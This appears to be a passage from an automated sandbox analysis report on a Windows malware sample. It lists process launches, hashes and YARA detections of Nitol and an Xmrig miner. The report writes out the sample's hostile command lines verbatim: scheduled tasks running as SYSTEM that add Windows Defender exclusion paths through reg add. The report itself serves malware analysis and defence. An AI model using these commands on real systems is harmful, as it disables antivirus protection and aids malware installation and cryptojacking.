                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:11
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:12
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:13
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:14
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:15
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:16
                                                                                                              Start time:22:42:48
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:17
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:18
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:19
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:20
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:21
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:22
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:23
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:24
                                                                                                              Start time:22:42:49
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:25
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:26
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:27
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:28
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:29
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:30
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:31
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:32
                                                                                                              Start time:22:42:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:33
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:34
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:35
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:36
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Run /TN "Task1"
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:37
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff731660000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:38
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                                              Imagebase:0x7ff61c6c0000
                                                                                                              File size:235'008 bytes
                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:39
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:40
                                                                                                              Start time:22:42:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\reg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                                              Imagebase:0x7ff6e1df0000
                                                                                                              File size:77'312 bytes
                                                                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:42
                                                                                                              Start time:22:43:22
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:43
                                                                                                              Start time:22:43:24
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:44
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:45
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:cmd /c echo.>c:\xxxx.ini
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:46
                                                                                                              Start time:22:43:25
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:47
                                                                                                              Start time:22:43:26
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:48
                                                                                                              Start time:22:43:51
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\53jGFr5v.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\ProgramData\53jGFr5v.exe
                                                                                                              Imagebase:0x420000
                                                                                                              File size:1'589'760 bytes
                                                                                                              MD5 hash:C12239FE6BC555339AA48D933FC376D2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:49
                                                                                                              Start time:22:43:58
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\ProgramData\efk2JUeS\lBoqoqIC.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:486'832 bytes
                                                                                                              MD5 hash:AA990DC3875790615E8CB024A78E9F9C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:50
                                                                                                              Start time:22:44:01
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:51
                                                                                                              Start time:22:44:01
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\DfP1K3\DfP1K3.exe"
                                                                                                              Imagebase:0xe90000
                                                                                                              File size:54'152 bytes
                                                                                                              MD5 hash:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:52
                                                                                                              Start time:22:44:04
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\ProgramData\atBs3ba9\d0oKoK2T.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\ProgramData\atBs3ba9\d0oKoK2T.exe 1776
                                                                                                              Imagebase:0x7ff721f20000
                                                                                                              File size:670'720 bytes
                                                                                                              MD5 hash:147936E67DBDD86961409FE7D5821DA6
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000034.00000002.3351062119.00007FF721F21000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Has exited:false

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.1%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:30.8%
                                                                                                                Total number of Nodes:480
                                                                                                                Total number of Limit Nodes:7
